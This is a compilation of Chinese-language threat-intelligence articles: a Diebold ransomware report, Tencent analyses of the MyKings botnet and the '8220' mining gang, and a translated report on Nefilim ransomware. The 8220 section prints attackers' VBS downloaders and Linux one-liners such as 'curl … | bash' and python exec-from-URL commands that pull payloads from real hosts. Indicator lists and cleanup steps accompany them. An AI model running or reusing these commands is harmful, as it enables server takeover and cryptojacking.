美国最大 ATM 供应商遭勒索软件攻击
美国最大 ATM 供应商 Diebold Nixdorf 遭勒索软件攻击。该公司表示黑客未能接触 ATM 或客户网络,只影响其企业网络。Diebold 有 3.5 万名员工,其 ATM 机器在全球的市场占有率估计为 35%,它还生产零售商使用的销售终端系统和软件。 攻击发生在 4 月 25 日晚上,安全团队探测到企业网络的异常行为,它立即采取行动隔离网络中的系统,阻止恶意程序扩散。该公司表示勒索软件没有影响到它的客户网络。入侵 Diebold 企业网络的是被称为 ProLock 的勒索软件。Diebold 称它没有向攻击者支付赎金。安全专家表示这么做也许更好,因为当前版本的 ProLock 解密工具会损坏数据库之类的大型文件。 (稿源:solidot,封面源自网络。)
Mykings 僵尸网络更新基础设施,大量使用 PowerShell 脚本进行“无文件”攻击挖矿
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Eyqm-lgQovFaJnk3FHihJQ 一、概述 MyKings僵尸网络2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络本轮活动主要更新点 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手挖矿木马名单中增加了“新冠”挖矿木马; 4.使用挖矿账号登陆,隐藏了钱包地址; 5.新增白利用文件; 6.不同系统版本执行脚本不同; 7.获取windows登陆密码 攻击流程图 二、解决方案 运维人员可参考以下方法手动清除Windows系统感染的挖矿木马,企业用户亦可使用腾讯T-Sec终端安全管理系统(腾讯御点)查杀病毒,参考安全建议提升服务器的安全性。 删除以下病毒文件: C:\Windows\debug\lsmose.exe C:\Windows\debug\lsmos.exe C:\Windows\debug\lsmo.exe C:\Program Files (x86)\Common Files\csrw.exe C:\Progra~1\Common Files\csrw.exe c:\windows\help\lsmosee.exe c:\windows\help\akpls.exe c:\windows\inf\lsmma.exe c:\windows\inf\lsmm.exe c:\windows\inf\lsmmaa.exe c:\windows\system32\new.exe c:\windows\system32\upsupx.exe c:\windows\inf\aspnet\lsma.exe c:\windows\inf\aspnet\lsmab.exe c:\windows\inf\aspnet\lsmaaa.exe c:\windows\inf\aspnet\lsma30.exe c:\windows\inf\aspnet\lsma31.exe c:\\windows\java\java.exe c:\windows\inf\aspnet\lsma12.exe c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\update.exe c:\windows\temp\servtestdos.dll C:\WINDOWS\Fonts\cd c:\windows\help\get.exe c:\windows\inf\aspnet\u.exe c:\windows\inf\winnts.exe c:\windows\temp\svchost.exe c:\windows\temp\conhost1.exe 删除病毒添加的计划任务 Mysa Mysa1 Mysa2 Mysa3 ok oka 删除病毒添加的WMI事件启动项 fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4 安全建议 1.Mysql端口非必要情况不要暴露在公网,使用足够强壮的Mysql口令; 2.修复MS010-17“永恒之蓝”漏洞,服务器暂时关闭不必要的端口(如135、139、445)。 三、详细分析 mykings本次活动通过mssql爆破手段攻击windows服务器,根据系统版本下发不同的脚本。 WIN10以下主要是对windows defender有关闭操作,并且会使用mimikatz导出windows密码。各系统对应的脚本下载链接: Windows 10,http://173.208.139.170:8170/win10.txt Windows 服务器,http://173.208.139.170:8170/sa.xsl Windows xp,http://173.208.139.170:8170/s.xsl Win Vista~Win8,http://173.208.139.170:8170/abc.txt 脚本入口处搜集IP,进程,内存,处理器信息,上传到FTP 接着下载batpower.txt Batpower首先下载kill.txt,主要作用是清理自身旧版本挖矿程序,以固定阵地,删除相应文件: 清理wmi启动项 下载uninstall.txt,卸载多款主流杀毒软件: 之后去ftp服务器下载三个挖矿木马文件,并设置成计划任务: 下载并设置v.sct开机启动,目前无法连接,具体功能暂时无法得知 继续下载执行wmi.txt,主要设置开机下载执行power.txt,s.txt Power.txt及s.txt有多个地址可供下载 Power.txt功能与batpower.txt功能一样。 s.txt会去下载hxxp://173.208.153.130:8130/wpd.rar,这是一个自解压文件,主要功能是清除竞争对手挖矿木马,如:NSABuffMiner、kingminer,还有最新的“新冠”挖矿木马 “coronav2“。 后下载执行hxxp://167.88.180.175:8175/download.txt,里面也会执行挖矿木马。 链接中的g.exe是pplive的loader模块,用做白利用,以下载并执行其他病毒模块。 该模块会根据命令行下载执行文件,不会做任何验证。 u.exe首先获取mirai僵尸网络下载IP 再获取更新地址: 扫描工具msinfo,并对公网和内网进行扫描攻击,包括使用永恒之蓝漏洞、SQL爆破、Telnet爆破、RDP爆破等多种手段: Mirai携带的永恒之蓝攻击模块 max.exe则是暗云Ⅲ木马,攻击流程无变化。 暗云Ⅲ的更新域名及下载链接 1201.exe是基于xmrig 2.0.4版本修改而来,矿机配置存放在资源段TXT中 “url”: “69.197.156.194:80”, “user”: “abc443”, “pass”: “x”, “url”: “win443.xmrpool.ru:443”, “user”: “abcd1443”, “pass”: “x”, 附录 IOCs MD5 74a09ef83de2599529c9a6f0278fdb60 9f86afae88b2d807a71f442891dfe3d4 929c393fcfb72f9af56ce34df88f82bb 539d218039ad0a2c6bf541af95a013bc a8c98125b9d04673f079bcc717e58a71 5364fae1de8db8fa3faf07bfaf2b706f b150d411a1e29e43b6423f19db4fd3ed 94d5e03b2d21f8f0c6d963570ecba6c1 5d461acc19ac7d2a993ddf0d8866cb1a 93515e391ac22a065279cadd8551d2bc bc7fc83ce9762eb97dc28ed1b79a0a10 d9c32681d65c18d9955f5db42154a0f3 f89cbaf4dbe490787adf5eeb9304d785 44ac832c2b71b4874e544e2b04a72834 6d0bb14c2f5a384bd5073a45db12dabe fa74df0a9a42d29018146520ae0b5585 9459494db3750da9fab3d9deaf4d1106 598ba6f7a900a78666bcb9774620f643 2293f46b3c293e5c637343447e582fdb 8e8f427d93e809137283abfad825b33d b6c1dacca555c61a26907296a04d10de a1783a56738b17ba117b5518399748b0 64ce5ad470cfa503882a3dfac382c6b4 a26ba601674371229eab93a585a79e6b 5c56774156b5fefe2e465b4546006f9a 61e1f73f2e8f566f959e3ffca120aa8b a8557ea0f4034ecf855087e3200354ac 2da63739662c5ea7231c930b61f73a72 5e87427c66ecb84a85700b1180d115f2 f18e88259b1043a6e06c9a16d4c0475e 1a7dcb9970287539774c7ade1cb7e483 e827621c5185488122da57ac16d1fca0 795dd160e8073d23f5c6954602bf3b89 a5b75dfb3b3358ad1a2ef8025ddebb29 cfa550296b848293f912fd625c114015 IP 208.110.71.194 80.85.152.247 66.117.2.182 70.39.124.70 150.107.76.227 103.213.246.23 103.106.250.161 103.106.250.162 144.208.127.215 167.88.180.175 172.83.155.170 173.208.133.114 173.208.153.130 173.247.239.186 192.236.160.237 199.168.100.74 23.236.69.114 74.222.14.97 66.117.6.174 DOMAIN www.upme0611.info mbr.kill0604.ru js.ftp1202.site wmi.1103bye.xyz ok.xmr6b.ru URL hxxp://167.88.180.175:8175/kill.txt hxxp://js.ftp1202.site:280/v.sct hxxp://167.88.180.175:8175/wmi.txt hxxp://173.208.153.130:8130/wpd.rar hxxp://167.88.180.175:8175/download.txt hxxp://js.ftp1202.site:280/v.sct hxxp://wmi.1103bye.xyz:8080/power.txt hxxp://172.83.155.170:8170/power.txt hxxp://192.236.160.237:8237/power.txt hxxp://144.208.127.215:8215/power.txt hxxp://103.106.250.161:8161/power.txt hxxp://103.106.250.162:8162/power.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://173.247.239.186:8186/g.exe hxxp://173.247.239.186:8186/u.exe hxxp://199.168.100.74:8074/max.exe hxxp://199.168.100.74:8074/1201.rar hxxp://23.236.69.114:8114/dll/64npf.sys hxxp://23.236.69.114:8114/update.txt hxxp://23.236.69.114/ups.html hxxp://23.236.69.114:8114/dll/wpcap.dll hxxp://23.236.69.114:8114/dll/packet.dll hxxp://23.236.69.114:8114/dll/npptools.dll hxxp://173.208.133.114:8114/upsupx.exe hxxp://www.upme0611.info/address.txt hxxp://mbr.kill0604.ru/cloud.txt hxxp://74.222.14.97/xpxmr.dat hxxp://ok.xmr6b.ru/xpxmr.dat hxxp://ok.xmr6b.ru/ok/wpd.html hxxp://66.117.6.174/wpdmd5.txt hxxp://66.117.6.174/wpdtest.dat hxxp://66.117.6.174/ver.txt hxxp://66.117.6.174/shellver.txt hxxp://66.117.6.174/csrs.exe hxxp://23.236.69.114:8114/ups.html hxxp://66.117.6.174:8114/update.txt hxxp://66.117.6.174/wpd.jpg hxxp://66.117.6.174/my1.html hxxp://172.83.155.170:280/v.sct hxxp://139.5.177.19:8019/blue.txt 参考链接 https://s.tencent.com/research/report/622.html https://mp.weixin.qq.com/s/KdeF1eaM-Dq1z_wOIb9_oA https://www.freebuf.com/column/187489.html
NEMTY 的继任者——Nefilim/Nephilim 勒索软件
现在是一个研究跟踪勒索软件趋势的有趣时机,特别是在过去的一两年里,我们已经看到“主流”勒索软件甚至进一步扩展到了数据勒索和盗窃领域。对文件进行加密是一回事,但必须将每一个勒索软件感染都视为违规行为,这给这些攻击活动的受害者增加了多层复杂性。对于GDPR以及现在类似法律和合规性障碍,这尤其复杂。 勒索软件家族,如Maze、CLOP、DoppelPaymer、Sekhmet和Nefilim/Nephilim都是威胁的案例,一旦感染,就会给受害者带来相当复杂的问题。虽然Maze、DopplePayer和REvil往往会得到大量媒体报道,但Nephilim是另一个迅速发展的家族,它发起了多起破坏性活动。如果受害者不能“配合”他们的要求,他们就会公布受害者的敏感信息。 概述 Nefilim出现于2020年3月,与另一个勒索软件家族NEMTY共享相当一部分代码。NEMTY和Nefilim/Nephilim背后的确切关系尚不清楚。 NEMTY于2019年8月作为一个公共项目推出,之后转为私有。目前的数据表明,在这两个家族背后的不是同一个人,更有可能的是,Nephilim背后的人以某种方式从NEMTY那里“获得”了必要的代码。 Nefilim和NEMTY的两个主要区别是支付模式,以及缺少RaaS操作。Nefilim指示受害者通过电子邮件与攻击者联系,而不是将他们引导到基于torm的支付网站。为了使家谱更加混乱,Nefilim似乎演变为了“Nephilim”,两者在技术上相似,主要区别在于扩展名和加密文件中的工件。 然而,也有情报表明,NEMTY已经继续并分支到一个新的“NEMTY Revenue”版本。在此之前,NEMTY的幕后主使宣布他们将把威胁私有化(不再公开访问RaaS行动)。 从技术上讲,Nephilim与其他著名的勒索软件家族没有什么不同。目前主要的传播方法是利用易受攻击的RDP服务。一旦攻击者通过RDP破坏了环境,他们就会继续建立持久性,在可能的情况下查找和窃取其他凭证,然后将勒索软件的payload传播给潜在目标。 Nephilim加密协议 在Nephilim样本中我们分析了实际的文件加密是通过标签组AES-128和RSA-2048处理的。注意,Nefilim/Nephilim背后的原始供应商也这样做。 特定的文件使用AES-128加密。此时,使用RSA-2048公钥加密AES加密密钥。公钥随后被嵌入到勒索软件的可执行payload中。这是一个不同于纯NEMTY的区域,后者已知使用了不同的密钥长度。例如,早期版本的NEMTY使用RSA-8192作为“主密钥”,用于加密目标配置数据和其他密钥(src: Acronis)。 我们还知道NEMTY的变体使用RSA-1024公钥来处理AES加密密钥。此外,在早期版本的NEMTY中,处理特定大小范围的文件的方式也存在差异。NEMTY的后续版本(又名NEMTY REVENUE 3.1)在计数器模式下利用AES-128和RSA-2048加密AES密钥。 目前,只有Nephilim背后的参与者能够解密受影响的文件。也就是说,没有已知的漏洞或方法来绕过攻击者对加密文件的保护。 感染后的行为 感染后,加密文件的扩展名为.nefilim或.Nephilim。在包含加密文件的目录中存放着类似的名为ransom的记录。 在某些情况下,对于Nephilim,“nephilm – decrypt.txt”将只写入~\AppData\Local\VirtualStore。本地存储的桌面壁纸的位置和名称各不相同。在最近的Nephilim感染中,备用桌面映像被写入%temp%,文件名为’ god.jpg ‘。 字符串,区别特征 Nephilim的另一个特点是使用嵌入的字符串和编译器路径来发送“微妙的信息”,主要是向研究人员和分析人员发送。例如,以下编译器路径可以在这些示例中找到(均在2020年4月7日编译): b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 而样本为: d4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 从2020年3月开始包含对特定AV厂商的额外攻击。 该样本来源于@malwrhunterteam 在3月13号的推文。 羞辱策略 Nefilim/Nephilim还威胁说,如果受害者拒绝配合要求,他们将公布敏感信息,这一点在这张典型的Nephilim勒索信中得到了证明。 受害者试图谈判或拒绝付款都属于不遵守规定的范畴。迄今为止,已有两家公司在Nephilim的“shaming”网站(clearnet和基于TOR的网站)上发布。值得注意的是,最初,其网站上列出的所有公司都是石油和能源公司。但是,在2020年4月23日至4月27日期间,该组织又在现场增加了三名受害者。其中一家是另一家大型石油和天然气公司,另外两家则被归类为“服装和时装”和“工程与建筑服务”。 其他多个勒索软件家族也遵循相同的做法,将“基本”勒索软件感染转变为完全(有时是灾难性的)数据泄露。使用该模型的其他知名家族包括Maze、REvil DoppelPaymer、CLOP、Sekhmet,以及最近的Ragnar。我们注意到,Nefilim/Nephilim也是“发誓”在当前新冠疫情大流行期间不攻击医疗实体、非营利组织和其他“关键”实体的家族之一。 结论 保护你的环境免受像Nephilim这样的威胁比以往任何时候都更加重要。为了防止数据丢失和大规模数据泄露的后果,企业必须依赖于一个现代的、受良好维护的、适当调整的、受信任的安全解决方案。预防是这些攻击的关键。即使可以通过解密器、备份或回滚来减轻加密/数据丢失的情况,受害者仍然面临其数据公开发布的问题。我们鼓励我们的客户分析和理解威胁,并采取迅速而适当的行动以防止事故发生。 为了方便起见,我们在下面提供了SHA256和SHA1哈希。 SHA256 8be1c54a1a4d07c84b7454e789a26f04a30ca09933b41475423167e232abea2b b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e 3080b45bab3f804a297ec6d8f407ae762782fa092164f8ed4e106b1ee7e24953 7de8ca88e240fb905fc2e8fd5db6c5af82d8e21556f0ae36d055f623128c3377 b227fa0485e34511627a8a4a7d3f1abb6231517be62d022916273b7a51b80a17 3bac058dbea51f52ce154fed0325fd835f35c1cd521462ce048b41c9b099e1e5 353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5 5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6 52e25bdd600695cfed0d4ee3aca4f121bfebf0de889593e6ba06282845cf39ea 35a0bced28fd345f3ebfb37b6f9a20cc3ab36ab168e079498f3adb25b41e156f 7a73032ece59af3316c4a64490344ee111e4cb06aaf00b4a96c10adfdd655599 08c7dfde13ade4b13350ae290616d7c2f4a87cbeac9a3886e90a175ee40fb641 D4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 B8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 SHA1 4595cdd47b63a4ae256ed22590311f388bc7a2d8 1f594456d88591d3a88e1cdd4e93c6c4e59b746c 6c9ae388fa5d723a458de0d2bea3eb63bc921af7 9770fb41be1af0e8c9e1a69b8f92f2a3a5ca9b1a e99460b4e8759909d3bd4e385d7e3f9b67aa1242 e53d4b589f5c5ef6afd23299550f70c69bc2fe1c c61f2cdb0faf31120e33e023b7b923b01bc97fbf 0d339d08a546591aab246f3cf799f3e2aaee3889 bbcb2354ef001f476025635741a6caa00818cbe7 2483dc7273b8004ecc0403fbb25d8972470c4ee4 d87847810db8af546698e47653452dcd089c113e E94089137a41fd95c790f88cc9b57c2b4d5625ba Bd59d7c734ca2f9cbaf7f12bc851f7dce94955d4 f246984193c927414e543d936d1fb643a2dff77b d87847810db8af546698e47653452dcd089c113e 消息来源:SentinelLABS, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接
“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,预备发起DDoS攻击
感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ 一、背景 腾讯安全威胁情报中心检测到“8220”挖矿木马变种攻击。“8220”挖矿团伙擅长利用WebLogic、JBoss反序列化漏洞,Redis、Hadoop未授权访问漏洞等Web漏洞攻击服务器挖矿。近期我们发现该团伙在攻击活动中通过Apache Struts远程代码执行漏洞(CVE-2017-5638)、Tomcat弱口令爆破进行传播的木马大幅增加。 木马在横向移动阶段会利用Python实现的Redis未授权漏洞访问漏洞对随机生成的约16万个IP进行扫描攻击,并且利用植入的shell脚本hehe.sh继续利用已有公钥认证记录的机器建立SSH连接进行内网扩散,最终在失陷机器植入多款门罗币挖矿木马以及Tsunami僵尸网络木马,后者被该团伙用来进行DDoS攻击。 “8220”挖矿木马团伙的攻击目标包括Windows和Linux服务器,在其使用的FTP服务器上,可以发现针对不同操作系统的攻击模块。该团伙释放挖矿木马时,会检查服务器是否有其他挖矿木马运行,将所有竞争挖矿木马进程结束,以独占服务器资源。 根据代码的相似性、C2关联性、挖矿时使用的相同门罗币钱包以及配置文件解密方法、相似的FTP服务器,腾讯安全专家认为,2020年初出现的StartMiner与“8220”挖矿木马属于同一团伙。该团伙当前版本恶意程序与C2服务器的通信已不再使用“8220”端口,根据近期捕获到的样本对其攻击偏好使用的文件名进行总结,发现其具有使用多种脚本包括VBS、PHP、Python、Powershell、Shell进行组合攻击的特点。 二、解决方案 企业运维人员可参考以下方法手动清除Linux和Windows系统感染的挖矿木马,参考安全建议提升服务器的安全性。 Linux系统 a. Kill进程/tmp/sh、/tmp/x32b、/tmp/x64b b. 删除文件 /tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、 /tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481) /tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、 /tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F) c. 删除包含“www.jukesxdbrxd.xyz”、“107.189.11.170”的crontab计划任务 安全建议: a. Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令 b. Tomcat服务器配置高强度密码认证 c. 设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes Windows系统 a. 杀死进程isassx.exe、steamhuby.exe、issaasss、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe b. 删除文件: c:\windows\temp\app.vbs c:\windows\temp\apps.vbs C:\Windows\Temp\ready.exe C:\ProgramData\guvpgnkpwv\steamhuby.exe C:\ProgramData\tumtkffywq\issaasss C:\Windows\temp\12.exe C:\Windows\temp\12.exe C:\Windows\Temp\mess.exe %HOMEPATH%\why.ps1 %HOMEPATH%\schtasks.ps1 c. 删除执行内容包含“why.ps1、why2.ps1、why3.ps1、kkmswx.ps1”的计划任务 安全建议: 及时修复Apache Struts高危漏洞; Tomcat服务器配置高强度密码认证。 推荐政府机构、大中型企业、科研单位采用腾讯安全完整解决方案全面提升信息系统的安全性。 腾讯安全解决方案部署示意图(图片可放大) 政企用户可根据业务应用场景部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,提升整体网络抗攻击能力。 腾讯安全系列产品应对8220挖矿木马的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截Redis未授权访问漏洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持Apache Struts远程命令执行漏洞、Redis未授权访问漏洞的检测; 2)已支持查杀8220挖矿木马家族样本。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受Apache Struts远程命令执行漏洞、Redis未授权访问漏洞影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)对利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵相关的网络通信。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 三、利用Struts漏洞(CVE-2017-5638)入侵服务器挖矿 Apache Struts是一款用于创建企业级Java Web应用的开源框架,Struts2存在远程代码执行的严重漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。 该漏洞能允许黑客远程代码执行,相当于整台服务器已托管给黑客,黑客可以利用此漏洞获取web应用的源程序,修改web应用内容,获取数据库密码并盗取数据库信息,更改系统代码,更改数据库密码等等。 黑客批量扫描Web服务器并针对存在CVE-2017-5638漏洞的机器进行攻击,然后通过shell写入VBS脚本文件app.vbs并启动运行。 c:\windows\temp\app.vbs代码内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://www.jukesxdbrxd.xyz/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/kmkww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/kmkww.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/kmkww.exe”) app.vbs下载得到挖矿木马母体steamhuby.exe,该样本拷贝自身到C:\ProgramData\guvpgnkpwv\steamhuby.exe,然后访问下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。 该钱包目前在公开矿池pool.hashvault.pro挖矿获得30个XMR,但是由于其使用多个私有矿池挖矿,实际收益会远大于这个数目。 漏洞攻击时利用Shell执行的另一段VBS代码apps.vbs下载的挖矿木马为ww.exe,存放至C:/Windows/temp/12.exe或C:/Windows/temp/13.exe,并直接传入挖矿参数开启挖矿。 c:\windows\temp\apps.vbs内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://jukesbrxd.xyz/ww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/12.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/13.exe –donate-level=1 -k -o 37.59.162.30:5790 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 四、爆破攻击Tomcat服务器挖矿 该团伙利用漏洞攻击成功后,会向目标服务器植入多款挖矿木马进行门罗币挖矿。 Tomcat 是由 Apache 开发的一个 Servlet 容器,实现了对 Servlet 和 JSP 的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等, /manager/html为tomcat自带管理功能后台,如果密码强度不高,容易被黑客破解入侵。 黑客针对Tomcat服务器进行扫描和暴力破解,然后将保存在FTP服务器上的PHP木马和VM木马下载到失陷机器,利用php木马继续下载挖矿木马。 Win.php 通过system执行cmd命令,利用certutil.exe下载ww.exe,存放至c:\windows\temp\kkw2.exe,传入参数开启挖矿:–donate-level=1 -k –max-cpu-usage 100 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B 创建脚本kkmw.txt、kksw.txt,利用ftp命令从服务器ftp[:]//107.189.11.170下载kmkww.exe、ww.exe,传入挖矿参数启动挖矿; 创建下载脚本poc.vbs,并写入以下代码,下载ww.exe并启动挖矿: Set objXMLHTTP=CreateObject(“MSXML2.XMLHTTP”) objXMLHTTP.open “GET”,”http://107.189.11.170/ww.exe”,false objXMLHTTP.send() If objXMLHTTP.Status=200 Then Set objADOStream=CreateObject(“ADODB.Stream”) objADOStream.Open objADOStream.Type=1 objADOStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile “C:\Windows\Temp\mess.exe” objADOStream.Close Set objADOStream=NothingEnd if Set objXMLHTTP=Nothing Set objShell=CreateObject(“WScript.Shell”) objShell.Exec(“C:\Windows\Temp\mess.exe –donate-level 1 -o 23.94.24.12:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B”) 通过Powershell命令下载和执行3.ps1、2.ps1。 创建poc2.vbs,写入与poc.vbs类似的下载代码,下载kmkww.exe启动挖矿。 Linx.php 修改DNS服务器为8.8.8.8 安装Linux下载工具: apt-get install wget -y; yum install wget -y; apt-get install curl -y; yum install curl -y; 利用多个下载工具下载bash脚本2start.jpg并执行,运行后rm -rf删除文件: get -q -O – http://107.189.11.170/2start.jpg | bash -sh; url -fsSL http://107.189.11.170/2start.jpg | bash -sh; wget -q -O – http://107.189.11.170/2start.jpg | bash -sh; curl -fsSL http://107.189.11.170/2start.jpg | bash -sh; cur -fsSL http://107.189.11.170/2start.jpg | bash -sh; lwp-download http://107.189.11.170/2start.jpg /tmp/2start.jpg; bash /tmp/2start.jpg; rm -rf 2start.jpg; 解码base64编码的python脚本并运行,最后history -c删除记录。 Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9hLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/a.py”).read())’ Base64: cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xMDcuMTg5LjExLjE3MC9iLnB5IikucmVhZCgpKSc= 解码: python -c ‘import urllib;exec(urllib.urlopen(“http://107.189.11.170/b.py”).read())’ Powershell 木马攻击Windows系统使用的3.ps1具有以下功能: 下载ww32.exe、kkw2.exe并保存至temp目录。 找到进程可能是其他挖矿木马的端口连接,杀死对应进程 将Powershell脚本why.ps1、why4.ps1安装为计划任务 “Update service for Oracle productsm”,并删除旧的计划任务。 匹配文件名,退出杀软进程和竞品挖矿木马进程,包括ddg.exe,然后启动自己的挖矿进程kkw2.exe。 Python 